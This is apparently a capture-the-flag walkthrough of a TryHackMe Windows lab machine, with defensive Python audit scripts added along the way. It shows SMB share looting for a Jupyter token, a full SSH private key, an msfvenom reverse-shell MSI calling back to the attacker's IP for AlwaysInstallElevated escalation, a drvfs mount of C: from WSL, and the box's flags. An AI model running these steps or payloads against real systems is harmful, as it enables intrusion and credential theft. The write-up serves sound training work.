Recon
- Port 47001 is opened by default by the lab environment (the Windows HTTPAPI/WinRM listener), so it can be ignored.
┌──(kali㉿dkri3c1)-[~]
└─$ rustscan -a 10.10.70.52 -r 1-65535 --ulimit 5000 -- -sC -sV -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.70.52:22
Open 10.10.70.52:135
Open 10.10.70.52:139
Open 10.10.70.52:445
Open 10.10.70.52:5985
Open 10.10.70.52:8888
Open 10.10.70.52:47001
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -sV -Pn" on ip 10.10.70.52
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-26 09:18 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:18
Completed Parallel DNS resolution of 1 host. at 09:18, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:18
Scanning 10.10.70.52 [7 ports]
Discovered open port 5985/tcp on 10.10.70.52
Discovered open port 8888/tcp on 10.10.70.52
Discovered open port 139/tcp on 10.10.70.52
Discovered open port 22/tcp on 10.10.70.52
Discovered open port 445/tcp on 10.10.70.52
Discovered open port 135/tcp on 10.10.70.52
Discovered open port 47001/tcp on 10.10.70.52
Completed SYN Stealth Scan at 09:18, 0.33s elapsed (7 total ports)
Initiating Service scan at 09:18
Scanning 7 services on 10.10.70.52
Completed Service scan at 09:18, 23.38s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.70.52.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 11.95s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 1.30s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
Nmap scan report for 10.10.70.52
Host is up, received user-set (0.29s latency).
Scanned at 2025-07-26 09:18:21 EDT for 37s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 124 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBae1NsdsMcZJNQQ2wjF2sxXK2ZF3c7qqW3TN/q91pWiDee3nghS1J1FZrUXaEj0wnAAAbYRg5vbRZRP9oEagBwfWG3QJ9AO6s5UC+iTjX+YKH6phKNmsY5N/LKY4+2EDcwa5R4uznAC/2Cy5EG6s7izvABLcRh3h/w4rVHduiwrueAZF9UjzlHBOxHDOPPVtg+0dniGhcXRuEU5FYRA8/IPL8P97djscu23btk/hH3iqdQWlC9b0CnOkD8kuyDybq9nFaebAxDW4XFj7KjCRuuu0dyn5Sr62FwRXO4wu08ePUEmJF1Gl3/fdYe3vj+iE2yewOFAhzbmFWEWtztjJb
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOGl51l9Z4Mg4hFDcQz8v6XRlABMyVPWlkEXrJIg53piZhZ9WKYn0Gi4fKkzo3blDAsdqpGFQ11wwocBCSJGjQU=
| 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOHw9uTZkIMEgcZPW9Z28Mm+FX66+hkxk+8rOu7oI6J9
135/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 124 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 124
5985/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8888/tcp open http syn-ack ttl 124 Tornado httpd 6.0.3
|_http-favicon: Unknown favicon MD5: 97C6417ED01BDC0AE3EF32AE4894FD03
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
| http-methods:
|_ Supported Methods: GET
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: TornadoServer/6.0.3
47001/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-26T13:18:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -1s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 34816/tcp): CLEAN (Couldn't connect)
| Check 2 (port 21907/tcp): CLEAN (Couldn't connect)
| Check 3 (port 22310/udp): CLEAN (Failed to receive data)
| Check 4 (port 22306/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds
Raw packets sent: 7 (308B) | Rcvd: 7 (308B)
Exploit
Port 445 is open, i.e. SMB file sharing, so use smbclient to see what is there. Then read the contents of the datasci-team share and get the files one by one. In the misc folder there is a jupyter-token.txt:
┌──(kali㉿kali)-[~/thm]
└─$ smbclient //10.10.10.36/datasci-team
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 25 11:27:02 2022
.. D 0 Thu Aug 25 11:27:02 2022
.ipynb_checkpoints DA 0 Thu Aug 25 11:26:47 2022
Long-Tailed_Weasel_Range_-_CWHR_M157_[ds1940].csv A 146 Thu Aug 25 11:26:46 2022
misc DA 0 Thu Aug 25 11:26:47 2022
MPE63-3_745-757.pdf A 414804 Thu Aug 25 11:26:46 2022
papers DA 0 Thu Aug 25 11:26:47 2022
pics DA 0 Thu Aug 25 11:26:47 2022
requirements.txt A 12 Thu Aug 25 11:26:46 2022
weasel.ipynb A 4308 Thu Aug 25 11:26:46 2022
weasel.txt A 51 Thu Aug 25 11:26:46 2022
15587583 blocks of size 4096. 8918797 blocks available
smb: \> cd misc
smb: \misc\> ls
. DA 0 Thu Aug 25 11:26:47 2022
.. DA 0 Thu Aug 25 11:26:47 2022
jupyter-token.txt A 52 Thu Aug 25 11:26:47 2022
15587583 blocks of size 4096. 8926011 blocks available
smb: \misc\>
┌──(kali㉿kali)-[~/thm]
└─$ cat jupyter-token.txt
067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a
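Since the foothold here came from a token file sitting on a readable share, the following is an added example (not part of the writeup) of the audit a defender would run over an exported or mounted share: it walks the tree, flags credential-looking filenames, and greps file contents for Jupyter-style tokens and private-key material. The sample tree, the 48-hex token and the key placeholder are constructed to mirror the datasci-team listing above; the regexes are assumptions to tune for your environment.

```python
import re
import tempfile
from pathlib import Path

# Content patterns for credential material that should never sit on a file share.
# Constructed for this example; extend them for your environment.
PATTERNS = {
    # Jupyter's default token is secrets.token_hex(24): 48 lowercase hex digits.
    "jupyter_token": re.compile(r"\b[0-9a-f]{48}\b"),
    # PEM-style private key headers (OpenSSH, RSA, EC, DSA).
    "private_key_pem": re.compile(r"-----BEGIN (?:OPENSSH |RSA |EC |DSA )?PRIVATE KEY-----"),
    # Bare base64 body of an openssh-key-v1 container ("openssh-key-v1" encoded).
    "openssh_key_v1_base64": re.compile(r"b3BlbnNzaC1rZXktdjE"),
}
# Filenames worth flagging even before looking inside.
SUSPICIOUS_NAMES = re.compile(
    r"(token|secret|passw|id_rsa|id_ed25519|id_ecdsa|\.pem$|\.ppk$)", re.IGNORECASE
)


def scan_share(root, max_bytes=1_000_000):
    """Walk an exported/mounted share and return (relative_path, label) findings."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if SUSPICIOUS_NAMES.search(path.name):
            findings.append((rel, "suspicious_filename"))
        try:
            # Only the first max_bytes are inspected so a large PDF cannot stall the audit.
            text = path.read_bytes()[:max_bytes].decode("utf-8", "ignore")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole audit
        for label, pattern in PATTERNS.items():
            if pattern.search(text):
                findings.append((rel, label))
    return findings


def build_sample_share():
    """Create a constructed directory tree mirroring the datasci-team share layout."""
    root = Path(tempfile.mkdtemp(prefix="datasci-team-"))
    (root / "misc").mkdir()
    (root / "notes").mkdir()
    # Constructed 48-hex token (not the token from the box).
    (root / "misc" / "jupyter-token.txt").write_text("0123456789abcdef" * 3 + "\n")
    (root / "requirements.txt").write_text("pandas\n")
    (root / "weasel.txt").write_text("Long-tailed weasel range notes (constructed)\n")
    # Constructed placeholder carrying only the PEM header, no real key material.
    (root / "notes" / "id_ed25519").write_text(
        "-----BEGIN OPENSSH PRIVATE KEY-----\n"
        "PLACEHOLDER-NOT-A-REAL-KEY\n"
        "-----END OPENSSH PRIVATE KEY-----\n"
    )
    return root


if __name__ == "__main__":
    for rel, label in scan_share(build_sample_share()):
        print(f"{label:24} {rel}")
```

Run it against a directory where the share is mounted (or a copy pulled with smbclient's recurse/mget) to get a list of files that need to be moved out of the share and rotated.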
Browse to the Jupyter web UI on port 8888 and paste the token 067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a into the login page; that gets you into the notebook.
In the top-right corner there is a menu option to open a terminal. First run uname -a, which shows this is WSL:
Linux DEV-DATASCI-JUP 4.4.0-17763-Microsoft #2268-Microsoft Thu Oct 07 16:36:00 PST 2021 x86_64 x86_64 x86_64 GNU/Linux
From that terminal I found an SSH private key (the base64 body of the key file):
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBUoe5ZSezzC65UZhWt4dbvxKor+dNggEhudzK+JSs+YwAAAKjQ358n0N+f
JwAAAAtzc2gtZWQyNTUxOQAAACBUoe5ZSezzC65UZhWt4dbvxKor+dNggEhudzK+JSs+Yw
AAAED9OhQumFOiC3a05K+X6h22gQga0sQzmISvJJ2YYfKZWVSh7llJ7PMLrlRmFa3h1u/E
qiv502CASG53Mr4lKz5jAAAAI2Rldi1kYXRhc2NpLWxvd3ByaXZAREVWLURBVEFTQ0ktSl
VQAQI=
But it would not let me connect:
┌──(kali㉿kali)-[/usr/share/peass/linpeas]
└─$ sudo ssh -i id_rsa dev-datasci@10.10.252.243
[sudo] password for kali:
Warning: Identity file id_rsa not accessible: No such file or directory.
dev-datasci@10.10.252.243: Permission denied (publickey,keyboard-interactive).
sudo -l: the command is not available in that environment.
In /home/dev-datasci/.local/share/jupyter there is a notebook_secret, which also does not look useful.
One idea here: replace the jupyter executable itself with /bin/sh. The privilege escalation works, but it looks like a rabbit hole:
root@DEV-DATASCI-JUP:/var# uname -a
Linux DEV-DATASCI-JUP 4.4.0-17763-Microsoft #2268-Microsoft Thu Oct 07 16:36:00 PST 2021 x86_64 x86_64 x86_64 GNU/Linux
Going back over the solution flow, I noticed the private key was probably being used wrongly. The key's naming follows the form <userid>_id_ed????, so the username used with ssh was wrong; the real user is dev-datasci-lowpriv.
Another pitfall here: a private key whose file permissions are too open cannot be used.
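The username mix-up comes from the comment field OpenSSH stores inside the private-key file, and the second pitfall is ssh's refusal to use a key readable by group or others. The added example below (not the author's code) parses the openssh-key-v1 container of the key pasted above following OpenSSH's PROTOCOL.key layout, extracts the comment to recover the account name, and includes the permission check. It assumes an unencrypted key (cipher "none", as here); for a passphrase-protected key the comment lives inside the encrypted section and the parser reports that instead. Private key bytes are parsed past but never printed.

```python
import base64
import struct

# Base64 body of the private key as shown in the writeup (PEM header/footer lines omitted).
PAGE_KEY_B64 = (
    "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW"
    "QyNTUxOQAAACBUoe5ZSezzC65UZhWt4dbvxKor+dNggEhudzK+JSs+YwAAAKjQ358n0N+f"
    "JwAAAAtzc2gtZWQyNTUxOQAAACBUoe5ZSezzC65UZhWt4dbvxKor+dNggEhudzK+JSs+Yw"
    "AAAED9OhQumFOiC3a05K+X6h22gQga0sQzmISvJJ2YYfKZWVSh7llJ7PMLrlRmFa3h1u/E"
    "qiv502CASG53Mr4lKz5jAAAAI2Rldi1kYXRhc2NpLWxvd3ByaXZAREVWLURBVEFTQ0ktSl"
    "VQAQI="
)

MAGIC = b"openssh-key-v1\x00"


def _read_string(buf, off):
    """Read one SSH 'string': uint32 big-endian length followed by that many bytes."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def parse_openssh_private_key(b64):
    """Return key type, cipher/KDF names and the comment of an openssh-key-v1 blob."""
    raw = base64.b64decode(b64)
    if not raw.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 container")
    off = len(MAGIC)
    cipher, off = _read_string(raw, off)      # "none" when the key has no passphrase
    kdf, off = _read_string(raw, off)         # "none" or "bcrypt"
    _kdfopts, off = _read_string(raw, off)
    (nkeys,) = struct.unpack(">I", raw[off:off + 4])
    off += 4
    if nkeys != 1:
        raise ValueError("unexpected number of keys: %d" % nkeys)
    pub_blob, off = _read_string(raw, off)    # public key: string type + key bytes
    priv_blob, off = _read_string(raw, off)   # private section (encrypted if cipher != none)
    key_type, _ = _read_string(pub_blob, 0)
    info = {
        "key_type": key_type.decode(),
        "cipher": cipher.decode(),
        "kdf": kdf.decode(),
        "encrypted": cipher != b"none",
        "comment": None,
    }
    if info["encrypted"]:
        return info  # the comment sits inside the encrypted section; needs the passphrase
    check1, check2 = struct.unpack(">II", priv_blob[:8])
    if check1 != check2:
        raise ValueError("checkint mismatch: corrupt or wrongly decrypted key")
    p = 8
    _ktype, p = _read_string(priv_blob, p)
    _pub, p = _read_string(priv_blob, p)
    _priv, p = _read_string(priv_blob, p)     # secret material: read past, never exposed
    comment, p = _read_string(priv_blob, p)
    info["comment"] = comment.decode()
    return info


def account_from_comment(comment):
    """Split a 'user@host' comment; host is None when the comment has no '@'."""
    user, _, host = comment.partition("@")
    return user, host or None


def mode_too_open(mode):
    """ssh ignores a private key whose mode grants any group/other bits (mode & 0o077)."""
    return bool(mode & 0o077)


if __name__ == "__main__":
    info = parse_openssh_private_key(PAGE_KEY_B64)
    print(info["key_type"], "comment:", info["comment"])
    print("account:", account_from_comment(info["comment"]))
    print("0644 too open:", mode_too_open(0o644), "| 0600 too open:", mode_too_open(0o600))
```

The comment is exactly what ssh-keygen writes as user@host at generation time, which is why it identifies the owning account more reliably than a guessed filename prefix; on the defender's side, the same parse tells you which account a leaked key belongs to so it can be rotated.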
Once connected, you can simply type powershell to get a PowerShell session:
dev-datasci-lowpriv@DEV-DATASCI-JUP C:\Users\dev-datasci-lowpriv>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\dev-datasci-lowpriv>
Get user Flag: THM{w3as3ls_@nd_pyth0ns}
Next, privilege escalation: use python3's http.server to transfer winPEAS. Start it:
┌──(kali㉿kali)-[/usr/share/peass/winpeas]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.17.9.114 - - [28/Jul/2025 21:28:45] "GET / HTTP/1.1" 200 -
10.17.9.114 - - [28/Jul/2025 21:28:45] code 404, message File not found
10.17.9.114 - - [28/Jul/2025 21:28:45] "GET /favicon.ico HTTP/1.1" 404 -
10.10.16.42 - - [28/Jul/2025 21:29:12] "GET /winPEASx64.exe HTTP/1.1" 200 -
Download it on the victim machine:
PS C:\Users\dev-datasci-lowpriv\Desktop> curl 10.17.9.114/winPEASx64.exe -o winpeas.exe
PS C:\Users\dev-datasci-lowpriv\Desktop> ls
Directory: C:\Users\dev-datasci-lowpriv\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/25/2022 5:21 AM 28916488 python-3.10.6-amd64.exe
-a---- 8/25/2022 7:40 AM 27 user.txt
-a---- 7/28/2025 6:29 PM 10144256 winpeas.exe
winPEAS output after uploading and running it:
+----------¦ Checking AlwaysInstallElevated
+ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
Both HKLM and HKCU are set to 0x1, so we can try uploading an MSI installer package.
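To check for this misconfiguration from the defender's side without running winPEAS, here is an added example (not from the writeup) that reads both hives with Python's standard winreg module and reports whether the policy is actually effective; Windows Installer honors AlwaysInstallElevated only when the DWORD is 1 in both HKLM and HKCU. The registry path is the standard policy key; the reader function is injectable so the assessment logic runs on any OS, and the verdict strings are my own.

```python
# Audit of the AlwaysInstallElevated policy. Windows Installer runs per-user MSI
# packages with SYSTEM privileges only when the DWORD is 1 in BOTH hives, so both are read.
INSTALLER_POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"


def read_policy_value(hive_name):
    """Read the DWORD from the live registry (Windows only); None if key or value is absent."""
    import winreg  # standard library, importable only on Windows builds of Python

    hive = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}[hive_name]
    try:
        with winreg.OpenKey(hive, INSTALLER_POLICY_KEY) as key:
            value, _kind = winreg.QueryValueEx(key, VALUE_NAME)
            return value
    except FileNotFoundError:
        return None


def assess_always_install_elevated(read=read_policy_value):
    """Return per-hive values, whether the policy is effective, and a remediation verdict.

    `read` is injectable so the decision logic can be exercised off-Windows.
    """
    values = {hive: read(hive) for hive in ("HKLM", "HKCU")}
    effective = all(values[h] == 1 for h in values)
    if effective:
        verdict = ("VULNERABLE: any user can install an MSI as SYSTEM; "
                   "disable 'Always install with elevated privileges' in both "
                   "Computer and User Configuration via Group Policy")
    elif any(values[h] == 1 for h in values):
        verdict = "PARTIAL: only one hive is set; not effective alone, but remove the setting"
    else:
        verdict = "OK: policy not enabled"
    return {"values": values, "effective": effective, "verdict": verdict}


if __name__ == "__main__":
    result = assess_always_install_elevated()
    for hive, value in result["values"].items():
        print(f"{hive}: {value!r}")
    print(result["verdict"])
```

The same two values are what winPEAS printed above; running this from a scheduled compliance job (or the equivalent reg query in your baseline tooling) catches the setting before an attacker does.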
Build the installer:
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.9.114 LPORT=6969 -f msi -o exp.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: exp.msi
Set up the environment. Listen on the local side:
nc -lvnp 6969
Then on the victim:
msiexec /quite /qn /i <filename>
This simply failed.
Thinking back over the earlier steps, I suspected the whole Windows C: drive could be mounted into the Linux (WSL) side; see this article:
https://www.scivision.dev/mount-usb-drives-windows-subsystem-for-linux/
mount -t drvfs 'c:' /mnt/c
After mounting, we can get root.
Get Root Flag: THM{evelated_w3as3l_l0ngest_boi}